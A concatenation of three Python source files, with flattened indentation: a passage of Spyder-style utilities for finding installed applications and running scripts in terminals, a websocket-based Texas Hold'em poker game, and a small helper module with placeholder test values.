apps[name + ' (' + fname + ')'] = expanded_fpath
# Join data
values = list(zip(*apps.values()))[-1]
for name, fpath in app_paths.items():
if fpath not in values:
apps[name] = fpath
return apps
def _get_linux_applications():
"""Return all system installed linux applications."""
# See:
# https://standards.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html
# https://askubuntu.com/q/433609
apps = {}
desktop_app_paths = [
'/usr/share/**/*.desktop',
'~/.local/share/**/*.desktop',
]
all_entries_data = []
for path in desktop_app_paths:
fpaths = glob.glob(path)
for fpath in fpaths:
entry_data = parse_linux_desktop_entry(fpath)
all_entries_data.append(entry_data)
for entry_data in sorted(all_entries_data, key=lambda x: x['name']):
if not entry_data['hidden'] and entry_data['type'] == 'Application':
apps[entry_data['name']] = entry_data['fpath']
return apps
def _get_mac_applications():
"""Return all system installed osx applications."""
apps = {}
app_folders = [
'/**/*.app',
'/Users/{}/**/*.app'.format(get_username())
]
fpaths = []
for path in app_folders:
fpaths += glob.glob(path)
for fpath in fpaths:
if os.path.isdir(fpath):
name = os.path.basename(fpath).split('.app')[0]
apps[name] = fpath
return apps
def get_application_icon(fpath):
"""Return application icon or default icon if not found."""
from qtpy.QtGui import QIcon
from spyder.utils.icon_manager import ima
if os.path.isfile(fpath) or os.path.isdir(fpath):
icon = ima.icon('no_match')
if sys.platform == 'darwin':
icon_path = _get_mac_application_icon_path(fpath)
if icon_path and os.path.isfile(icon_path):
icon = QIcon(icon_path)
elif os.name == 'nt':
pass
else:
entry_data = parse_linux_desktop_entry(fpath)
icon_path = entry_data['icon_path']
if icon_path:
if os.path.isfile(icon_path):
icon = QIcon(icon_path)
else:
icon = QIcon.fromTheme(icon_path)
else:
icon = ima.icon('help')
return icon
def get_installed_applications():
"""
Return all system installed applications.
The return value is a list of tuples where the first item is the icon path
and the second item is the program executable path.
"""
apps = {}
if sys.platform == 'darwin':
apps = _get_mac_applications()
elif os.name == 'nt':
apps = _get_win_applications()
else:
apps = _get_linux_applications()
if sys.platform == 'darwin':
apps = {key: val for (key, val) in apps.items() if osp.isdir(val)}
else:
apps = {key: val for (key, val) in apps.items() if osp.isfile(val)}
return apps
def open_files_with_application(app_path, fnames):
"""
Generalized method for opening files with a specific application.
Returns a dictionary of the command used and the return code.
A code equal to 0 means the application executed successfully.
"""
return_codes = {}
if os.name == 'nt':
fnames = [fname.replace('\\', '/') for fname in fnames]
if sys.platform == 'darwin':
if not (app_path.endswith('.app') and os.path.isdir(app_path)):
raise ValueError('`app_path` must point to a valid OSX '
'application!')
cmd = ['open', '-a', app_path] + fnames
try:
return_code = subprocess.call(cmd)
except Exception:
return_code = 1
return_codes[' '.join(cmd)] = return_code
elif os.name == 'nt':
if not (app_path.endswith(('.exe', '.bat', '.com', '.cmd'))
and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Windows '
'executable!')
cmd = [app_path] + fnames
try:
return_code = subprocess.call(cmd)
except OSError:
return_code = 1
return_codes[' '.join(cmd)] = return_code
else:
if not (app_path.endswith('.desktop') and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Linux '
'application!')
entry = parse_linux_desktop_entry(app_path)
app_path = entry['exec']
multi = []
extra = []
if len(fnames) == 1:
fname = fnames[0]
if '%u' in app_path:
cmd = app_path.replace('%u', fname)
elif '%f' in app_path:
cmd = app_path.replace('%f', fname)
elif '%U' in app_path:
cmd = app_path.replace('%U', fname)
elif '%F' in app_path:
cmd = app_path.replace('%F', fname)
else:
cmd = app_path
extra = fnames
elif len(fnames) > 1:
if '%U' in app_path:
cmd = app_path.replace('%U', ' '.join(fnames))
elif '%F' in app_path:
cmd = app_path.replace('%F', ' '.join(fnames))
if '%u' in app_path:
for fname in fnames:
multi.append(app_path.replace('%u', fname))
elif '%f' in app_path:
for fname in fnames:
multi.append(app_path.replace('%f', fname))
else:
cmd = app_path
extra = fnames
if multi:
for cmd in multi:
try:
return_code = subprocess.call([cmd], shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
else:
try:
return_code = subprocess.call([cmd] + extra, shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
return return_codes
def python_script_exists(package=None, module=None):
"""
Return absolute path if Python script exists (otherwise, return None)
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
if package is None:
spec = importlib.util.find_spec(module)
if spec:
path = spec.origin
else:
path = None
else:
spec = importlib.util.find_spec(package)
if spec:
path = osp.join(spec.origin, module)+'.py'
else:
path = None
if path:
if not osp.isfile(path):
path += 'w'
if osp.isfile(path):
return path
def run_python_script(package=None, module=None, args=[], p_args=[]):
"""
Run Python script in a separate process
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
assert isinstance(args, (tuple, list)) and isinstance(p_args, (tuple, list))
path = python_script_exists(package, module)
run_program(sys.executable, p_args + [path] + args)
def shell_split(text):
"""
Split the string `text` using shell-like syntax
This avoids breaking single/double-quoted strings (e.g. containing
strings with spaces). This function is almost equivalent to the shlex.split
function (see standard library `shlex`) except that it is supporting
unicode strings (shlex does not support unicode until Python 2.7.3).
"""
assert is_text_string(text) # in case a QString is passed...
pattern = r'(\s+|(?<!\\)".*?(?<!\\)"|(?<!\\)\'.*?(?<!\\)\')'
out = []
for token in re.split(pattern, text):
if token.strip():
out.append(token.strip('"').strip("'"))
return out
def get_python_args(fname, python_args, interact, debug, end_args):
"""Construct Python interpreter arguments"""
p_args = []
if python_args is not None:
p_args += python_args.split()
if interact:
p_args.append('-i')
if debug:
p_args.extend(['-m', 'pdb'])
if fname is not None:
if os.name == 'nt' and debug:
# When calling pdb on Windows, one has to replace backslashes by
# slashes to avoid confusion with escape characters (otherwise,
# for example, '\t' will be interpreted as a tabulation):
p_args.append(osp.normpath(fname).replace(os.sep, '/'))
else:
p_args.append(fname)
if end_args:
p_args.extend(shell_split(end_args))
return p_args
def run_python_script_in_terminal(fname, wdir, args, interact,
debug, python_args, executable=None):
"""
Run Python script in an external system terminal.
:str wdir: working directory, may be empty.
"""
if executable is None:
executable = get_python_executable()
# If fname or python_exe contains spaces, it can't be ran on Windows, so we
# have to enclose them in quotes. Also wdir can come with / as os.sep, so
# we need to take care of it.
if os.name == 'nt':
fname = '"' + fname + '"'
wdir = wdir.replace('/', '\\')
executable = '"' + executable + '"'
p_args = [executable]
p_args += get_python_args(fname, python_args, interact, debug, args)
if os.name == 'nt':
cmd = 'start cmd.exe /K "'
if wdir:
cmd += 'cd ' + wdir + ' && '
cmd += ' '.join(p_args) + '"' + ' ^&^& exit'
# Command line and cwd have to be converted to the filesystem
# encoding before passing them to subprocess, but only for
# Python 2.
# See https://bugs.python.org/issue1759845#msg74142 and
# spyder-ide/spyder#1856.
if PY2:
cmd = encoding.to_fs_from_unicode(cmd)
wdir = encoding.to_fs_from_unicode(wdir)
try:
if wdir:
run_shell_command(cmd, cwd=wdir)
else:
run_shell_command(cmd)
except WindowsError:
from qtpy.QtWidgets import QMessageBox
from spyder.config.base import _
QMessageBox.critical(None, _('Run'),
_("It was not possible to run this file in "
"an external terminal"),
QMessageBox.Ok)
elif sys.platform.startswith('linux'):
programs = [{'cmd': 'gnome-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'konsole',
'wdir-option': '--workdir',
'execute-option': '-e'},
{'cmd': 'xfce4-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'xterm',
'wdir-option': None,
'execute-option': '-e'},]
for program in programs:
if is_program_installed(program['cmd']):
arglist = []
if program['wdir-option'] and wdir:
arglist += [program['wdir-option'], wdir]
arglist.append(program['execute-option'])
arglist += p_args
if wdir:
run_program(program['cmd'], arglist, cwd=wdir)
else:
run_program(program['cmd'], arglist)
return
elif sys.platform == 'darwin':
f = tempfile.NamedTemporaryFile('wt', prefix='run_spyder_',
suffix='.sh', dir=get_temp_dir(),
delete=False)
if wdir:
f.write('cd {}\n'.format(wdir))
if running_in_mac_app(executable):
f.write(f'export PYTHONHOME={os.environ["PYTHONPATH"]}\n')
f.write(' '.join(p_args))
f.close()
os.chmod(f.name, 0o777)
def run_terminal_thread():
proc = run_shell_command('open -a Terminal.app ' + f.name, env={})
# Prevent race condition
time.sleep(3)
proc.wait()
os.remove(f.name)
thread = threading.Thread(target=run_terminal_thread)
thread.start()
else:
raise NotImplementedError
def check_version(actver, version, cmp_op):
"""
Check version string of an active module against a required version.
If dev/prerelease tags result in TypeError for string-number comparison,
it is assumed that the dependency is satisfied.
Users on dev branches are responsible for keeping their own packages up to
date.
Copyright (C) 2013 The IPython Development Team
Distributed under the terms of the BSD License.
"""
if isinstance(actver, tuple):
actver = '.'.join([str(i) for i in actver])
try:
if cmp_op == '>':
return parse_version(actver) > parse_version(version)
elif cmp_op == '>=':
return parse_version(actver) >= parse_version(version)
elif cmp_op == '=':
return parse_version(actver) == parse_version(version)
elif cmp_op == '<':
return parse_version(actver) < parse_version(version)
elif cmp_op == '<=':
return parse_version(actver) <= parse_version(version)
else:
return False
except TypeError:
return True
def get_module_version(module_name):
"""Return module version or None if version can't be retrieved."""
ver = None
try:
mod = __import__(module_name)
ver = getattr(mod, '__version__', getattr(mod, 'VERSION', None))
except ModuleNotFoundError:
pass
if not ver:
ver = get_package_version(module_name)
return ver
def get_package_version(package_name):
"""Return package version or None if version can't be retrieved."""
# When support for Python 3.7 and below is dropped, this can be replaced
# with the built-in importlib.metadata.version
try:
ver = pkg_resources.get_distribution(package_name).version
return ver
except pkg_resources.DistributionNotFound:
return None
def is_module_installed(module_name, version=None, interpreter=None):
"""
Return True if module ``module_name`` is installed
If ``version`` is not None, checks that the module's installed version is
consistent with ``version``. The module must have an attribute named
'__version__' or 'VERSION'.
version may start with =, >=, > or < to specify the exact requirement ;
multiple conditions may be separated by ';' (e.g. '>=0.13;<1.0')
If ``interpreter`` is not None, checks if a module is installed with a
given ``version`` in the ``interpreter``'s environment. Otherwise checks
in Spyder's environment.
"""
if interpreter is not None:
if is_python_interpreter(interpreter):
cmd = dedent("""
try:
import {} as mod
except Exception:
print('No Module') # spyder: test-skip
print(getattr(mod, '__version__', getattr(mod, 'VERSION', None))) # spyder: test-skip
""").format(module_name)
try:
# use clean environment
proc = run_program(interpreter, ['-c', cmd], env={})
stdout, stderr = proc.communicate()
stdout = stdout.decode().strip()
except Exception:
return False
if 'No Module' in stdout:
return False
elif stdout != 'None':
# the module is installed and it has a version attribute
module_version = stdout
else:
module_version = None
else:
# Try to not take a wrong decision if interpreter check fails
return True
else:
# interpreter is None, just get module version in Spyder environment
try:
module_version = get_module_version(module_name)
except Exception:
# Module is not installed
return False
# This can happen if a package was not uninstalled correctly. For
# instance, if it's __pycache__ main directory is left behind.
try:
mod = __import__(module_name)
if not getattr(mod, '__file__', None):
return False
except Exception:
pass
if version is None:
return True
else:
if ';' in version:
versions = version.split(';')
else:
versions = [version]
output = True
for _ver in versions:
match = re.search(r'[0-9]', _ver)
assert match is not None, "Invalid version number"
symb = _ver[:match.start()]
if not symb:
symb = '='
assert symb in ('>=', '>', '=', '<', '<='),\
"Invalid version condition '%s'" % symb
ver = _ver[match.start():]
output = output and check_version(module_version, ver, symb)
return output
def is_python_interpreter_valid_name(filename):
"""Check that the python interpreter file has a valid name."""
pattern = r'.*python(\d\.?\d*)?(w)?(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def is_python_interpreter(filename):
"""Evaluate whether a file is a python interpreter or not."""
real_filename = os.path.realpath(filename) # To follow symlink if existent
if (not osp.isfile(real_filename) or
not is_python_interpreter_valid_name(filename)):
return False
elif is_pythonw(filename):
if os.name == 'nt':
# pythonw is a binary on Windows
if not encoding.is_text_file(real_filename):
return True
else:
return False
elif sys.platform == 'darwin':
# pythonw is a text file in Anaconda but a binary in
# the system
if is_anaconda() and encoding.is_text_file(real_filename):
return True
elif not encoding.is_text_file(real_filename):
return True
else:
return False
else:
# There's no pythonw in other systems
return False
elif encoding.is_text_file(real_filename):
# At this point we can't have a text file
return False
else:
return check_python_help(filename)
def is_pythonw(filename):
"""Check that the python interpreter has 'pythonw'."""
pattern = r'.*python(\d\.?\d*)?w(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def check_python_help(filename):
"""Check that the python interpreter can compile and provide the zen."""
try:
proc = run_program(filename, ['-c', 'import this'], env={})
stdout, _ = proc.communicate()
stdout = to_text_string(stdout)
valid_lines = [
'Beautiful is better than ugly.',
'Explicit is better than implicit.',
'Simple is better than complex.',
'Complex is better than complicated.',
]
if all(line in stdout for line in valid_lines):
return True
else:
return False
except Exception:
return False
def is_spyder_process(pid):
"""
Test whether given PID belongs to a Spyder process.
This is checked by testing the first three command line arguments. This
function returns a bool. If there is no process with this PID or its
command line cannot be accessed (perhaps because the process is owned by
another user), then the function returns False.
"""
try:
p = psutil.Process(int(pid))
# Valid names for main script
names = set(['spyder', 'spyder3', 'spyder.exe', 'spyder3.exe',
'bootstrap.py', 'spyder-script.py', 'Spyder.launch.pyw'])
if running_under_pytest():
names.add('runtests.py')
# Check the first three command line arguments
arguments = set(os.path.basename(arg) for arg in p.cmdline()[:3])
conditions = [names & arguments]
return any(conditions)
except (psutil.NoSuchProcess, psutil.AccessDenied):
return False
def get_interpreter_info(path):
"""Return version information of the selected Python interpreter."""
try:
out, __ = run_program(path, ['-V']).communicate()
out = out.decode()
except Exception:
out = ''
return out.strip()
def find_git():
"""Find git executable in the system."""
if sys.platform == 'darwin':
proc = subprocess.run(
osp.join(HERE, "check-git.sh"), capture_output=True)
if proc.returncode != 0:
return None
return find_program('git')
else:
return find_program('git')
|
poker.py
|
import time
import random
import pokerhands
from operator import attrgetter
import time
import pokerstrat
import server
from threading import Thread
from websocket_server import WebsocketServer
#card class
class Card:
RANKS=['2','3','4','5','6','7','8','9','10','J', 'Q', 'K', 'A']
SUITS=['h', 'c', 's', 'd']
def __init__(self,rank, suit, faceup=True):
self.rank=rank
self.suit=suit
self.values=[]
self.__value=(Card.RANKS.index(self.rank)+1)
self.faceup=faceup
def __str__(self):
if self.faceup:
return str(self.rank)+str(self.suit)
else:
return 'XX'
@property
def value(self):
v=self.__value
return v
#hand class (also used for Player)
class Hand:
serial=0
def __init__(self, name, table, server, strategy='Random'):
self.strategy=[]
self.stratname=strategy
strategy_class=getattr(pokerstrat, strategy)
strat=strategy_class(self)
self.strategy.append(strat)
self.server = server
self.cards=[]
self.total_cards=(self.cards+table.cards)
table.players.append(self)
self.name=name
Hand.serial+=1
self.position=Hand.serial
self.small_blind=False
self.big_blind=False
self.dealer=False
self.hand_value=0
self.rep=''
self.tie_break=0
self.raw_data=0
self.is_folded=False
self.stack=1000
self.stake=0
self.in_pot=0
self.to_play=0
self.all_in=False
self.first_all_in=False
self.raised=0
self.carry_over=0
#data points for play analysis:
self.history=[]
self.pots_played=0
self.win=0
self.raises=0
self.calls=0
self.checks=0
@property
def play_analysis(self):
pass
@property
def get_position(self):
return self.position%pot.table_size
def __str__(self):
rep='\n'+str(self.name)+'\t stack='+str(self.stack)+'\n'
if self.small_blind:
rep+=' small blind'
elif self.big_blind:
rep+=' big blind'
elif self.dealer:
rep+=' dealer'
return rep
def get_value(self):
self.total_cards=(self.cards+table.cards)
rep, hand_value, tie_break, raw_data=pokerhands.evaluate_hand(self.total_cards)
self.rep=str(rep)
self.hand_value=hand_value
self.tie_break=tie_break
self.raw_data=raw_data
return hand_value, rep, tie_break, raw_data
def print_cards(self):
rep=''
if self.is_folded:
rep='FF'
else:
for card in self.cards:
rep+=str(card)+' '
print (rep)
def flip(self):
for card in self.cards: card.faceup=not card.faceup
def fold(self, pot):
self.is_folded=True
self.in_pot=0
self.stake=0
self.raised=0
print (str(self.name)+' folds')
pot.folded_players.append(self)
if self in pot.active_players:
pot.active_players.remove(self)
if pot.one_remaining:
pot.stage=5
def no_play(self, pot):
next_player(pot)
self.stake=0
def check_call(self, pot):
if self.to_play==0:
print (str(self.name)+' checks')
else:
if self.to_play>self.stack:
self.stake=self.stack
else:
self.stake=self.to_play
print (str(self.name)+' calls '+str(self.stake))
if pot.stage==0 and pot.raised==False:
pot.limpers+=1
next_player(pot)
def bet(self, pot, stake):
if pot.already_bet:
print (str(self.name)+' raises '+str(stake-self.to_play))
self.raised+=1
pot.limpers=0
pot.raised=True
else:
print (str(self.name)+' bets '+str(stake))
pot.already_bet=True
self.stake=stake
pots[-1].to_play+=(self.stake-self.to_play)
next_player(pot, True)
def ante(self, pot):
if self.small_blind:
self.stack-=BLINDS[0]
pot.total+=BLINDS[0]
self.in_pot+=BLINDS[0]
if self.big_blind:
self.stack-=BLINDS[1]
pot.total+=BLINDS[1]
pot.to_play=BLINDS[1]
self.in_pot+=BLINDS[1]
def bust(self):
print (str(self.name)+' is bust')
list_index=table.players.index(self)
for p in table.players[list_index+1:]:
p.position-=1
table.players.remove(self)
def clear(self):
self.cards=[]
self.is_folded=False
self.all_in=False
self.raised=0
def add(self, cards):
self.cards.append(cards)
#__________represents the card deck - shuffled each round
class Deck(Hand):
def __init__(self):
self.cards=[]
def populate(self):
for rank in Card.RANKS:
for suit in Card.SUITS:
card=Card(rank, suit)
self.cards.append(card)
def shuffle(self):
random.shuffle(self.cards)
def print_cards(self):
rep=''
for card in self.cards:
rep+=str(card)+' '
print (rep)
def deal_to(self, hand, cards=1, faceup=True):
if len(self.cards)<cards:
print ('not enough cards to deal')
elif len(self.cards)==0:
print ('deck empty')
else:
dealt=[]
if not faceup:
for card in self.cards:
card.faceup=False
for i in range (0,cards):
dealt.append(self.cards.pop())
for card in dealt:
hand.add(card)
#__________________represents the overall game
class Table(Hand):
def __init__(self):
self.cards=[]
self.players=[]
self.is_folded=False
self.button=0
self.hands=0
self.blinds_timer=0
def print_cards(self):
rep='Community cards_______________\n'
if self.is_folded:
rep='FF'
else:
for card in self.cards:
card.faceup=True
rep+=str(card)+' '
print (rep)
def print_players(self):
for player in self.players:
print (player)
def clear(self):
self.cards=[]
#_______________POT represents the pot for each individual round of play
class Pot(object):
stage_dict={0:'pre-flop bet', 1:'dealing the flop', 2:'dealing the turn', 3:'dealing the river'}
deal_sequence=[0,3,1,1]
pot_number=0
def __init__(self, table, name):
self.players=[]
self.folded_players=[]
self.active_players=[]
self.limpers=0
self.name=name
self.blinds=BLINDS
self.total=0
self.button=table.button
#the amount each player has to call
self.to_play=0
#0=antes+ pre-flop, 1=post-flop, 2=turn, 3=river
self.stage=0
#defines turn within each betting stage
self.turn=0
#self.no_raise
self.no_raise=0
#already bet - works out if the round starts with 0 bet
self.already_bet=False
self.raised=False
@property
def is_frozen(self):
if len(self.active_players)<=1:
self.active_players=[]
return True
else:
return False
@property
def yet_to_play(self):
ytp=self.table_size-(self.turn+1)
if ytp<1: ytp=1
return ytp
@property
def one_remaining(self):
if len(self.folded_players)==(self.table_size-1):
return True
else:
return False
@property
def table_size(self):
return len(self.players)
def __str__(self):
rep='Pot= '+str(self.total)+'. to play:'+str(self.to_play)
return rep
def set_blinds(self):
dealer=(self.button)%self.table_size
small_blind=(self.button+1)%self.table_size
big_blind=(self.button+2)%self.table_size
self.players[dealer].dealer=True
self.players[small_blind].small_blind=True
self.players[big_blind].big_blind=True
return
@property
def who_plays(self):
next_up=0
if self.stage==0:
next_up=(self.button+3)%self.table_size
return next_up
else:
next_up=(self.button+1)%self.table_size
return next_up
class Side_pot(Pot):
serial=0
def __init__(self, parent):
Pot.__init__(self, parent, Pot)
self.button=parent.button
Side_pot.serial+=1
self.name='side pot '+str(Side_pot.serial)
self.players=[]
table=Table()
players = {}
# https://github.com/Pithikos/python-websocket-server/blob/master/server.py
# Called for every client connecting (after handshake)
def new_client(client, server):
print("New client connected and was given id %d" % client['id'])
server.send_message_to_all("Hey all, a new client has joined us")
# Called for every client disconnecting
def client_left(client, server):
for i in players.values():
if (i[1] == client['id']):
print(table.players)
print(players)
print(i[0].name)
#table.players.remove(i[0])
print("Client(%d) disconnected" % client['id'])
# Called when a client sends a message
def message_received(client, server, message):
print(message)
if len(message) > 200:
message = message[:200]+'..'
m = message.split(":")
if(m[0] == 'join'):
print("new player joined the table")
players[m[1]] = (Hand(m[1], table, server, 'Human'), client)
if(m[1] == 'turn'):
cur = players[m[1]][0]
#print("Client(%d) said: %s" % (client['id'], message))
PORT=24
s = WebsocketServer(PORT)
s.set_fn_new_client(new_client)
s.set_fn_client_left(client_left)
s.set_fn_message_received(message_received)
sockThread = Thread(target=s.run_forever, name="WebSocket")
sockThread.daemon = True
sockThread.start()
#________________FUNCTIONS____________________________________________________
#clears the players hands, comm cards, deck and moves the button on
def debug(pot):
print('debug______________________')
for player in pot.players:
print (str(player.name)+' Stack='+str(player.stack)+' Stake='+str(player.stake)+' Player in pot='+str(player.in_pot)+' Pot total='+str(pot.total)+' all_in='+str(player.all_in)+'first all in'+str(player.first_all_in))
print ('is folded'+str(player.is_folded))
print ('raw data='+str(player.raw_data))
print ('position='+str(player.position))
for pot in pots:
print (str(pot.name)+' total '+ str(pot.total))
print ('yet to play:'+str(pot.yet_to_play))
print ('active players')
for player in pot.active_players:
print (str(player.name))
print ('table size '+str(pot.table_size))
print ('limpers='+str(pot.limpers))
print ('no raise '+str(pot.no_raise))
print ('frozen='+str(pot.is_frozen))
print ('one remaining='+str(pot.one_remaining))
print ('Pot to play: '+str(pot.to_play))
print ('turn'+str(pot.turn)+' no_raise'+str(pot.no_raise))
print ('______________________________')
#helper function to move the play on
def next_player(pot, is_raise=False):
pot.turn+=1
if is_raise:
pot.no_raise=1
else:
pot.no_raise+=1
return
def next_hand(table, deck):
table.clear()
deck.clear()
Side_pot.serial=0
for hand in table.players:
hand.clear()
hand.small_blind=False
hand.big_blind=False
hand.dealer=False
hand.first_all_in=False
table.button+=1
#calculates the values and payouts
def ante_up(pot):
for player in pot.players:
player.ante(pot)
print (player)
deck.deal_to(player, 2)
if player.stratname=='Human':
player.flip()
player.print_cards()
pot.already_bet=True
print (pot)
print ('\n\n\n')
def betting_round(pot, table):
global pots
is_side_pot=False
create_side_pot=False
side_potters=[]
while pot.no_raise<(pot.table_size):
next_up=(int(pot.who_plays)+(pot.turn))%pot.table_size
player=pot.players[next_up]
player.to_play=(pots[-1].to_play-player.in_pot)
if player.to_play<0:
player.to_play=0
#is the player folded? decide action
if pots[-1].is_frozen==False:
if player in pots[-1].active_players:
print (str(player.name)+' to play '+ str(player.to_play)+'\n')
for strategy in player.strategy:
# Get player move and update all clients
if(player.stratname == 'Human'):
player.get_value()
# options=[['x', 'f', 'b'], ['c', 'r', 'f'], ['c', 'f']]
# choices={0:'check, fold or bet', 1:'call, raise, fold', 2:'call all-in or fold'}
# action=''
op=0
if player.to_play==0:
op=0
elif player.to_play<player.stack:
op=1
else: op=2
s.send_message_to_all(str(player.name)+' to play '+ str(player.to_play)+'\n')
s.send_message(players[str(player.name)][1], str(op))
c = 30
while c > -1:
s.send_message_to_all("time:"+str(player.name)+":"+str(c))
time.sleep(1)
c-=1
player.no_play(pot)
else:
s.send_message_to_all(str(player.name)+' to play '+ str(player.to_play)+'\n')
strategy.decide_play(player, pots[-1])
else:
player.no_play(pot)
else:
player.no_play(pot)
#adjust player totals and check for all-ins
pots[-1].total+=player.stake
player.in_pot+=player.stake
player.stack-=player.stake
if player.stack==0 and player.first_all_in==False:
print (str(player.name)+' is all in ')
is_side_pot=True
player.all_in=True
player.first_all_in=True
#debug(pot)
if pots[-1].one_remaining:
is_side_pot=False
#deal with refunds_____________________________
if is_side_pot:
for player in pots[-1].players:
if player.is_folded==False:
side_potters.append(player)
side_potters.sort(key=attrgetter('in_pot'), reverse=True)
big_bet=side_potters[0].in_pot
next_pot_players=[]
#main pot refund_____________________
print ('side pot')
print ('high bet'+str(big_bet))
low_bet=side_potters[-1].in_pot
print ('low bet'+str(low_bet))
for player in side_potters:
refund=(player.in_pot-low_bet)
if len(next_pot_players)>1:
create_side_pot=True
player.in_pot-=refund
pot.total-=refund
player.stack+=refund
player.carry_over=refund
print ('player in side pot - '+str(player.name))
if player.carry_over>0:
next_pot_players.append(player)
else:
if player in pots[-1].active_players:
pots[-1].active_players.remove(player)
print (str(player.name))
print ('refund...'+str(refund))
#create side pots _________________________________________________
if create_side_pot:
sidepot=Side_pot(pot)
for player in next_pot_players:
sidepot.players.append(player)
sidepot.total+=player.carry_over
player.in_pot+=player.carry_over
player.stack-=player.carry_over
if player.stack>0:
player.first_all_in=False
player.all_in=False
pots[-1].active_players.append(player)
pots.append(sidepot)
#print out pot totals at the end of the round______________________________
for pot in pots:
print (str(pot.name))
pot.to_play=0
print ('pot size= '+str(pot.total))
#zero the player cash in the pot
for player in pot.players:
player.in_pot=0
player.stake=0
player.raised=0
#reset various pot variables for next betting round
pots[0].no_raise=0
pots[0].to_play=0
pots[0].turn=0
pots[0].stage+=1
pots[0].already_bet=False
pots[0].limpers=0
def showdown(pot):
scoring=[]
if pot.one_remaining:
for player in pot.players:
if player.is_folded==False:
print (str(player.name)+' wins'+str(pot.total))
player.stack+=pot.total
else:
for player in pot.players:
if player.is_folded==False:
player.get_value()
scoring.append(player)
#rank hands in value+tie break order
scoring.sort(key=attrgetter('hand_value', 'tie_break'), reverse=True)
split_pot=[]
print ('\n\n\n')
for player in scoring:
if player.stratname!='Human':
player.flip()
player.print_cards()
print (player.name+' has '+str(player.rep))
#check for split pot
split_stake=0
split=False
for player in scoring[1:]:
if player.hand_value==scoring[0].hand_value and player.tie_break==scoring[0].tie_break:
split=True
split_pot.append(scoring[0])
split_pot.append(player)
if split:
print ('split pot')
split_stake=int((pot.total/(len(split_pot))))
for player in split_pot:
print (str(player.name)+' wins '+str(split_stake))
player.stack+=split_stake
else:
scoring[0].stack+=pot.total
print (str(scoring[0].name)+' wins '+str(pot.total))
#_______________________________________________________________________gameplay
######################
#set up the game and players
status='setup'
BLINDS=[10,20]
player6=Hand('Alex', table, 'SklanskySys2')
deck=Deck()
while status == 'setup':
if (players.keys().__len__()) == 1:
status = 'play'
status='play'
#for i in range (0,2):
pots=[]
while status=='play':
#increment the table hand#
print('hi')
#shuffle the deck
deck.populate()
deck.shuffle()
#create pot for this hand
pot=Pot(table, 'main')
for player in table.players:
pot.players.append(player)
pot.active_players.append(player)
pots.append(pot)
#allocate blinds and ante up
pot.set_blinds()
print ('Hand#'+str(table.hands))
print ('Blinds: '+str(BLINDS))
ante_up(pot)
#debug(pot)
#table.print_players()
while pot.stage<4:
deck.deal_to(table, Pot.deal_sequence[pot.stage], True)
print (str(Pot.stage_dict[pot.stage]))
table.print_cards()
betting_round(pots[-1], table)
#table.print_players()
if len(table.players)>1:
for pot in pots:
showdown(pot)
table.hands+=1
table.blinds_timer=table.hands%6
if table.blinds_timer==5:
BLINDS[:] = [x*2 for x in BLINDS]
for player in table.players[:]:
print (player.name, player.stack, BLINDS[1])
if player.stack<=BLINDS[1]:
player.bust()
if len(table.players)==1:
status='winner'
print ('\n\n\n')
next_hand(table, deck)
for player in table.players:
print (str(player.name)+' wins the game')
print(debug(pot))
|
common.py
|
# # # # #
# common.py
#
# Contains methods used across
# multiple backend files
#
# University of Illinois/NCSA Open Source License
# Copyright (c) 2015 Information Trust Institute
# All rights reserved.
#
# Developed by:
#
# Information Trust Institute
# University of Illinois
# http://www.iti.illinois.edu
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal with
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# Redistributions of source code must retain the above copyright notice, this list
# of conditions and the following disclaimers. Redistributions in binary form must
# reproduce the above copyright notice, this list of conditions and the following
# disclaimers in the documentation and/or other materials provided with the
# distribution.
#
# Neither the names of Information Trust Institute, University of Illinois, nor
# the names of its contributors may be used to endorse or promote products derived
# from this Software without specific prior written permission.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE CONTRIBUTORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH THE SOFTWARE.
#
# # # # #
from datetime import datetime
from subprocess import check_output
import json
import threading
def getCurrentTimestampAsStr():
return str(datetime.now())
def getTemplateAsString(pathToTemplate):
with open(pathToTemplate, "r") as temp:
tString = temp.read()
return tString
def getPocPhoneNumber():
return "(555) 123-4567 (Test Number Only)"
def getLocation():
return "Olympus Mons (Test Location Only)"
def getDescription():
return "Winter getaway, snowfall rare (Test Description Only)"
def getJsonStrUnformatted(inputDict):
return json.loads(json.JSONEncoder().encode(inputDict))
def getJsonStrFormatted(inputDict):
return json.dumps(getJsonStrUnformatted(inputDict), sort_keys=True, indent=4)
def monToNum(mon):
return {
'Jan': 1,
'Feb': 2,
'Mar': 3,
'Apr': 4,
'May': 5,
'Jun': 6,
'Jul': 7,
'Aug': 8,
'Sep': 9,
'Oct': 10,
'Nov': 11,
'Dec': 12,
}[mon]
def toTimestamp(mon, day, hh, mm, ss, year=None):
today = datetime.today()
if year == None:
year = today.year
if mon > today.month:
year -= 1
return datetime(year, mon, day, hh, mm, ss).timestamp()
def cmd(command, isShell=False):
return check_output(command.split(' '), shell=isShell).decode('utf-8')
def timestampToPrettyDate(timestamp):
return datetime.fromtimestamp(timestamp).strftime('%Y/%m/%d %H:%M:%S')
def getFileType(theFile):
return cmd('file ' + theFile).split(': ')[1]
